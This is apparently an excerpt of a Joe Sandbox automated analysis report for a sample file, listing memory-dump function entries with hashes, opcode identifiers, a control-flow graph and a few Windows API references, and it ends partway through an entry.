                                                                      • String ID:
                                                                      • API String ID: 6842923-0
                                                                      • Opcode ID: 445f2256c4df6ee5363e9d6672317485bc1f1b2bc1a5e21f8428b83b8b6f693f
                                                                      • Instruction ID: 01f6552f7f974cbde928c99b7e171728008add4a50c6b3810027a4a6455508d6
                                                                      • Opcode Fuzzy Hash: 445f2256c4df6ee5363e9d6672317485bc1f1b2bc1a5e21f8428b83b8b6f693f
                                                                      • Instruction Fuzzy Hash: D4411474E05248CFDB18CFEAC9556DDBBB2AF89304F60D16AC414AB265EB385906CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1645 4ec0488-4ec048a 1646 4ec048c 1645->1646 1647 4ec0490-4ec0492 1645->1647 1646->1647 1648 4ec0498-4ec04b8 1647->1648 1649 4ec0494-4ec0497 1647->1649 1651 4ec04bf-4ec056c KiUserExceptionDispatcher 1648->1651 1652 4ec04ba 1648->1652 1649->1648 1657 4ec0574-4ec0582 1651->1657 1652->1651 1658 4ec0588-4ec059f 1657->1658 1659 4ec089a-4ec08cc 1657->1659 1662 4ec05a6-4ec05af 1658->1662 1663 4ec05a1 1658->1663 1664 4ec088d-4ec0893 1662->1664 1663->1662 1665 4ec0899 1664->1665 1666 4ec05b4-4ec062a 1664->1666 1665->1659 1671 4ec06e6-4ec0740 1666->1671 1672 4ec0630-4ec069e 1666->1672 1681 4ec0741-4ec078f 1671->1681 1682 4ec06a0-4ec06e0 1672->1682 1683 4ec06e1-4ec06e4 1672->1683 1688 4ec0878-4ec0883 1681->1688 1689 4ec0795-4ec0877 1681->1689 1682->1683 1683->1681 1691 4ec088a 1688->1691 1692 4ec0885 1688->1692 1689->1688 1691->1664 1692->1691
                                                                      APIs
                                                                      • KiUserExceptionDispatcher.NTDLL ref: 04EC0563
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: DispatcherExceptionUser
                                                                      • String ID:
                                                                      • API String ID: 6842923-0
                                                                      • Opcode ID: cf715f8f4bd96cfcd6ff7634da57e34dee73b1f03b7ddf53c41966e77a310e43
                                                                      • Instruction ID: dcd5016854fe6171ac08a561c7f0d17b41b69de5d4e0918f8497aa455de7f249
                                                                      • Opcode Fuzzy Hash: cf715f8f4bd96cfcd6ff7634da57e34dee73b1f03b7ddf53c41966e77a310e43
                                                                      • Instruction Fuzzy Hash: 8241D174E01248CBDB28DFEAD9546DEBBB2AB89304F20D12ED418AB255DB355946CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • KiUserExceptionDispatcher.NTDLL ref: 04EC09BB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: DispatcherExceptionUser
                                                                      • String ID:
                                                                      • API String ID: 6842923-0
                                                                      • Opcode ID: 1528d19b4b5bf11f4701270abe5a3d50e4b26f4715f722dbc4ac856e7bc0e642
                                                                      • Instruction ID: 942b049c1013513b228d6dd210eaf195e5a909602f82760cc2d86c5b79168638
                                                                      • Opcode Fuzzy Hash: 1528d19b4b5bf11f4701270abe5a3d50e4b26f4715f722dbc4ac856e7bc0e642
                                                                      • Instruction Fuzzy Hash: F941EE74E01248CBEB18CFEAD95479EFBB2AF89304F20D12ED418AB254DB355946CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ceb8001cfdcfedeaeb091a5d9e9323509764f9c9368b2b2d1f91859c7d715a8
                                                                      • Instruction ID: 036a399974e59c3fc8a48fb7345aaf6d70ba763de1b620b54cfbe916c1644b27
                                                                      • Opcode Fuzzy Hash: 9ceb8001cfdcfedeaeb091a5d9e9323509764f9c9368b2b2d1f91859c7d715a8
                                                                      • Instruction Fuzzy Hash: BD124E78E00218CFDB24DFA5C894BADBBB2BF89304F2485AAD409A7395DB355D46CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a6ccf31b8d411816a40d2b2fac0b495d6043176317c8ee68da587c31ba644b0
                                                                      • Instruction ID: 1f2d12e0740dbf5f5eaf6cd8b57cfb890c41a1c53897b9d7ea11cb689453cdfc
                                                                      • Opcode Fuzzy Hash: 2a6ccf31b8d411816a40d2b2fac0b495d6043176317c8ee68da587c31ba644b0
                                                                      • Instruction Fuzzy Hash: 0FF16335F002188FCB18DFB5D8946AEBBB6BF89304B14896ED446EB395DB359C02CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6bb3f6f66c7a6563ab71acfc47c76f7230d01d7641f6449ad3533bea347e82e9
                                                                      • Instruction ID: 2b200ddef16269e5154ea1d6126c8fc7084458bd47fb4d9e7fc94498a44d3a18
                                                                      • Opcode Fuzzy Hash: 6bb3f6f66c7a6563ab71acfc47c76f7230d01d7641f6449ad3533bea347e82e9
                                                                      • Instruction Fuzzy Hash: C7F1E274E00218DFDB24DFA9C884B9DFBB6BF88304F14C6A9D808AB255DB759985CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0064cbb369aa97484d6503dccb9c1f17aebb1a590a1f75ff6803f71dffcbc7ff
                                                                      • Instruction ID: aa43748167ef1598ebc441e0e7e250cef453f9e03c32c9552caa1a6018c0815a
                                                                      • Opcode Fuzzy Hash: 0064cbb369aa97484d6503dccb9c1f17aebb1a590a1f75ff6803f71dffcbc7ff
                                                                      • Instruction Fuzzy Hash: BEE16734D04258CFDB25DFA9C994B9DBBB2BF89304F2085A9D409AB3A5DB355E81CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8692f20ea52a55c7b9c1b84af973e5608736a83f4c83160a879c216be8766deb
                                                                      • Instruction ID: d5f72731656d8026ec7dc231563718202bed9c2d0eb577ca09b5ab31a0bbdf45
                                                                      • Opcode Fuzzy Hash: 8692f20ea52a55c7b9c1b84af973e5608736a83f4c83160a879c216be8766deb
                                                                      • Instruction Fuzzy Hash: 09D1E478E00218CFDB24DFA5D994B9DBBB2BF89304F2084A9D409AB355DB355E82CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e068660c1ba2015e6580d3f2be02bad50511bae16619f38da69c3fba7707c7ce
                                                                      • Instruction ID: 40926f7164a21b08a72354eebb3c98b1c46c6c12a718550e7cc6d1ef51a5d407
                                                                      • Opcode Fuzzy Hash: e068660c1ba2015e6580d3f2be02bad50511bae16619f38da69c3fba7707c7ce
                                                                      • Instruction Fuzzy Hash: 7FD1E478E00218CFDB64DFA5D994B9DBBB2BF88304F2085A9D409AB365DB355E85CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72a63f7ab978d0a988ac302bae725dc8befbf8e1403c3a08366ff4ed16f9bf96
                                                                      • Instruction ID: b5ccb219bc14cf63134dd20b115d5f9fcb8d53927098d3950be2a7b805bef98d
                                                                      • Opcode Fuzzy Hash: 72a63f7ab978d0a988ac302bae725dc8befbf8e1403c3a08366ff4ed16f9bf96
                                                                      • Instruction Fuzzy Hash: B2C1C278E00218CFDB24DFA5D994B9DBBB2BF89304F2084A9D409AB355DB355E82CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cf4ed60832a244214eaa5353346e5faae53b232f6f30f0a255f5788363e45e9d
                                                                      • Instruction ID: e3f07f66f92969c20bab79504ccb02de79b3b0b6633188e2b40170263cd7b664
                                                                      • Opcode Fuzzy Hash: cf4ed60832a244214eaa5353346e5faae53b232f6f30f0a255f5788363e45e9d
                                                                      • Instruction Fuzzy Hash: F3C1C478E00218CFDB64DFA5D994B9DBBB2BF89304F2084A9D419AB355DB355E82CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3bd0686c164e4e0ee3aa3dad0e6196a1f9355f3ab2a76d3ee0a72d6d524af423
                                                                      • Instruction ID: 8e3a33d991f7d55e92951b763fddb9ef62a506397fd6b04cb059a11432042080
                                                                      • Opcode Fuzzy Hash: 3bd0686c164e4e0ee3aa3dad0e6196a1f9355f3ab2a76d3ee0a72d6d524af423
                                                                      • Instruction Fuzzy Hash: 13D1D378E00218CFDB24DFA5D994B9DBBB2BF89304F2084A9D409AB355DB355E82CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d38250b8856e7ed6fe7d28ba6c2e07e8cfa27fc8f6cf2efb1bcbd83c4af46e78
                                                                      • Instruction ID: 83b6bd128c41d44f81de3dedd2d6166e08fd69e5e04316605ffe214d7ead1f1e
                                                                      • Opcode Fuzzy Hash: d38250b8856e7ed6fe7d28ba6c2e07e8cfa27fc8f6cf2efb1bcbd83c4af46e78
                                                                      • Instruction Fuzzy Hash: 1DD1D474E00218CFDB64DFA5D994B9DBBB2BF88304F2085AAD409A7365DB355E85CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0a6d13c9550865f2e915e036a2d48b4658920b6603084b2d530e4d66adde5441
                                                                      • Instruction ID: 4115b8a197d3ce627b154650f84513c95e53c8bf113523a49d9c1f592ec5685b
                                                                      • Opcode Fuzzy Hash: 0a6d13c9550865f2e915e036a2d48b4658920b6603084b2d530e4d66adde5441
                                                                      • Instruction Fuzzy Hash: 31C1B278E00218CFDB64DFA5D994B9DBBB2BF88304F2085A9D409AB365DB355E85CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 06d867a4bfc42fb24917a16aa544a7f7a360de4f22531beaac2e2c58af14a092
                                                                      • Instruction ID: 4226bd1be87f1a7b866e18cfbee92b8cc8d7b5ab5a5ae8b51f70b1c4ab7f269d
                                                                      • Opcode Fuzzy Hash: 06d867a4bfc42fb24917a16aa544a7f7a360de4f22531beaac2e2c58af14a092
                                                                      • Instruction Fuzzy Hash: 77919239E103198FCB04DFA4D9549DDB7BAFF89304F249619E405BF264EB30A946DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 63d550c7a5afb2c4cbffac31546c31fefc87fdaf7a2c7a8775b205f2642f077f
                                                                      • Instruction ID: 398201987910f6672da57614c7a6d418ac6b4471262d7cbed80da75d927ac4c8
                                                                      • Opcode Fuzzy Hash: 63d550c7a5afb2c4cbffac31546c31fefc87fdaf7a2c7a8775b205f2642f077f
                                                                      • Instruction Fuzzy Hash: 8491C335E103198FCB00DFE5D8449DDBBBAFF89304F249619E515BB264EB34A986CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: de93ed99c3156af1f2b71faa874acb9afc09ec32cac74aab95243db884d8c5ac
                                                                      • Instruction ID: f74e2cbfd422adf6b476bed9e234ece8bc4a6a8158798290f9c9d7173016b110
                                                                      • Opcode Fuzzy Hash: de93ed99c3156af1f2b71faa874acb9afc09ec32cac74aab95243db884d8c5ac
                                                                      • Instruction Fuzzy Hash: 3FA10370D00208CFDB24DFA9C998BDDBBB1FF89304F208669E409AB2A1DB755985CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 39f31b0f87ab4647f9d203f37a4e8b341cd309654ebf3f9750baeaa2ec5aa6af
                                                                      • Instruction ID: fbaadc878d8a9869e52a34f5e237536162f7802288ad7c1a47abed2ba5cbbe01
                                                                      • Opcode Fuzzy Hash: 39f31b0f87ab4647f9d203f37a4e8b341cd309654ebf3f9750baeaa2ec5aa6af
                                                                      • Instruction Fuzzy Hash: ACA10370D00208CFDB24DFA9C998BDDBBB5FF89304F208669E418AB2A1DB755985CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 436e50f887115630e4cbc524ebc8e39ee205acd1d2b62d6e5f48e7822ae9ea88
                                                                      • Instruction ID: 1b03b72520c827f31d061aae9c55845233aeb53db2ecc875b1e253667644985d
                                                                      • Opcode Fuzzy Hash: 436e50f887115630e4cbc524ebc8e39ee205acd1d2b62d6e5f48e7822ae9ea88
                                                                      • Instruction Fuzzy Hash: E0A1AE74E01228CFEB28CF6AC944B9DFAF2AF89304F14D1AAD40CA7255DB345A85CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4e462570923aa06fe9e00d0e7792bfb82c38db0c28835e2fdb935fe68641f6ee
                                                                      • Instruction ID: df7cd8e6d655e579326e47378c20b28d6f3e54829c070e62531bd1a044478b37
                                                                      • Opcode Fuzzy Hash: 4e462570923aa06fe9e00d0e7792bfb82c38db0c28835e2fdb935fe68641f6ee
                                                                      • Instruction Fuzzy Hash: 1EA1A075E012288FEB28CF6AD944BDDFAF2AF89304F14D0AAD408A7255DB345A85CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 74926024f456a5532ae208bbe6e96489bb41a2d162da5e4638013a32930b219e
                                                                      • Instruction ID: b324f07d93b0d0f79281205a044d8ae9a0384954c5a2a77b3f898724966c3636
                                                                      • Opcode Fuzzy Hash: 74926024f456a5532ae208bbe6e96489bb41a2d162da5e4638013a32930b219e
                                                                      • Instruction Fuzzy Hash: 4FA1A274E012188FEB28CF6AC944B9DFAF2BF89304F14D1AAD408A7255DB345A85CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d424b5b4e2a7c0f150d5adbef071ddb1018fdb70ebdd7bb333cf450f47c43dd4
                                                                      • Instruction ID: 1d3ff559c4c7492879eb5330d5a7a95688fddab5e13d4a33c35b0e87b3b693d2
                                                                      • Opcode Fuzzy Hash: d424b5b4e2a7c0f150d5adbef071ddb1018fdb70ebdd7bb333cf450f47c43dd4
                                                                      • Instruction Fuzzy Hash: 67A1AE74E012288FEB28CF6AD954BDDFAF2BF89304F14D4AAD508A7255DB345A85CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c31b9489b8c8c6715a98c99df99258a97148205c5a17ccd753033b0b52319d7a
                                                                      • Instruction ID: 96059b4f8f988f78758299edfdd728dda9fdf57018bd9e15976032d985f8feec
                                                                      • Opcode Fuzzy Hash: c31b9489b8c8c6715a98c99df99258a97148205c5a17ccd753033b0b52319d7a
                                                                      • Instruction Fuzzy Hash: 3BA1AE74E01228CFEB28CF6AD944BDDFAF2AF89304F14D4AAD408A7255DB345A85CF11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fafab7f5be640d132b384eb3270da8a35ba630ab1f91ccf9a92a39734f1ef13d
                                                                      • Instruction ID: ac84da845d4a193e7e86c0752771f8a007b59f9d5a76ca1fc98e8fc7e92a2a44
                                                                      • Opcode Fuzzy Hash: fafab7f5be640d132b384eb3270da8a35ba630ab1f91ccf9a92a39734f1ef13d
                                                                      • Instruction Fuzzy Hash: 2FA19D74E012288FEB28CF6AC944B9DFAF2AF89304F14D0AAD508A7255DB345A85CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6dfd204242a5b5dcda3ed5b44b4a0f8d4fded11fb1035aad64a8f497daed65e
                                                                      • Instruction ID: 7074601df716ee70e74bdb8a416aa128bda5d9ef6d8865a590401f85fd35d671
                                                                      • Opcode Fuzzy Hash: d6dfd204242a5b5dcda3ed5b44b4a0f8d4fded11fb1035aad64a8f497daed65e
                                                                      • Instruction Fuzzy Hash: 39A19274E016288FEB28CF6AC944BDDFBF2AF89304F14D1AAD408A7255DB345A85CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5f3d838e40b2832247e82ed801be2e333f26c138add686808f708bbaa8ea15b9
                                                                      • Instruction ID: 9a69a4ebd1ba39f004b1a726fd7641d931f5cd126276de2849866745cf41f4db
                                                                      • Opcode Fuzzy Hash: 5f3d838e40b2832247e82ed801be2e333f26c138add686808f708bbaa8ea15b9
                                                                      • Instruction Fuzzy Hash: 79A19274E012188FEB28CF6AC944B9EFAF2BF89304F14D0EAD508A7255DB345A85CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d114b514b90879a6fbcf9e99ab5833a0b0d8a6b82ce0bb86e1e6b4803dc5ad4f
                                                                      • Instruction ID: bbf2238bc9049acdb471e0a076162d540ee441a42c741aa88ceacee302a42a44
                                                                      • Opcode Fuzzy Hash: d114b514b90879a6fbcf9e99ab5833a0b0d8a6b82ce0bb86e1e6b4803dc5ad4f
                                                                      • Instruction Fuzzy Hash: B0A1AF74E012288FEB28CF6AC944B9DFBF2AF89304F14D5EAD508A7255DB345A85CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 03f0ce2753fbd3cc39163b917af802a4c39ee7d1d647fc8e9f38a2f5d2bdb6a7
                                                                      • Instruction ID: c9ab1018fe71c56fd4ec7451f8ffd8a523595834c460efc7f4677064b288a7c5
                                                                      • Opcode Fuzzy Hash: 03f0ce2753fbd3cc39163b917af802a4c39ee7d1d647fc8e9f38a2f5d2bdb6a7
                                                                      • Instruction Fuzzy Hash: D1A1AE74E012288FEB28CF6AC954B9DFBF2BF89304F14D1AAD508A7254DB345A85CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.736812449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c60000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b17050d9964b2429d30a2f0fd8a9df0097cd5f204f770f15c0ce966d38540959
                                                                      • Instruction ID: e80fdee967b7dbe95db5f97f5752eec9509d144110371f5f2cab7b27aa6466e0
                                                                      • Opcode Fuzzy Hash: b17050d9964b2429d30a2f0fd8a9df0097cd5f204f770f15c0ce966d38540959
                                                                      • Instruction Fuzzy Hash: 1C91F470900208CFDB24DFA9C998BDDBBB1FF49314F209269E419BB292DB719985CF14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f5072a3d2614f25dca5880ee26272c42a97a8e07cc75bdcaaedcc9098a8c65d5
                                                                      • Instruction ID: 6fc1dd15cdee224ae66cebbb595786d6771cbdb7d3d09a3715f3b1920764b029
                                                                      • Opcode Fuzzy Hash: f5072a3d2614f25dca5880ee26272c42a97a8e07cc75bdcaaedcc9098a8c65d5
                                                                      • Instruction Fuzzy Hash: FD71A770E006188FEB68CF6AC944B9DFBF2AF88304F14D1AAD50DA7255DB345A86CF11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.738925084.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ec0000_0OZQi3b0tM.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
